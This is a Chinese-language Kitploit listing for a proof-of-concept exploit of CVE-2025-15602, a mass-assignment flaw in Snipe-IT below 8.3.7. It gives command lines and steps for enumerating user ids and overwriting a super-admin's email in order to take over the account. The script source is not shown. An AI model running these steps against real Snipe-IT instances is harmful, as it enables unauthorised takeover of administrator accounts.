Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-15602-PoC — Snipe-IT < 8.3.7 批量赋值漏洞导致权限提升 | Kitploit
工具/GitHubGitHub/nxvh1337/cve-2025-15602-poc
权限提升漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试身份验证
GitHubnxvh1337/cve-2025-15602-poc

CVE-2025-15602-PoC

Snipe-IT < 8.3.7 批量赋值漏洞导致权限提升

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-15602-PoC

CVE-2025-15602-PoC 是针对 Snipe-IT 中 CVE-2025-15602 漏洞的概念验证。 其中一个脚本用于列出所有用户,另一个脚本用于接管超级管理员账户。

背景

用户只有编辑用户的权限,他可以利用该权限列出所有用户,并实现对超级管理员账户的接管。

list_users.py

别忘了修改脚本中的 BASE_URL,以匹配你的 snipe-it 实例。

列出实例中的所有用户,以获取你想接管的超级管理员的 id。

root@kitploit:~
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100

exploit_auth.py

别忘了修改脚本中的 BASE_URL,以匹配你的 snipe-it 实例。

通过批量赋值(mass assignment)接管超级管理员账户。

重要: 你需要先从 list_users.py 获取正确信息,否则无法生效。id、username 和 first_name 必须与目标账户完全一致。

root@kitploit:~
python3 exploit_auth.py \
  --target-id 1 \
  --admin-username admin \
  --admin-firstname Admin \
  --admin-email [email protected] \
  --attacker-username your_user \
  --attacker-password your_pass

之后,你可以通过你设置的电子邮件重置密码。

依赖

root@kitploit:~
pip install requests beautifulsoup4
下载工具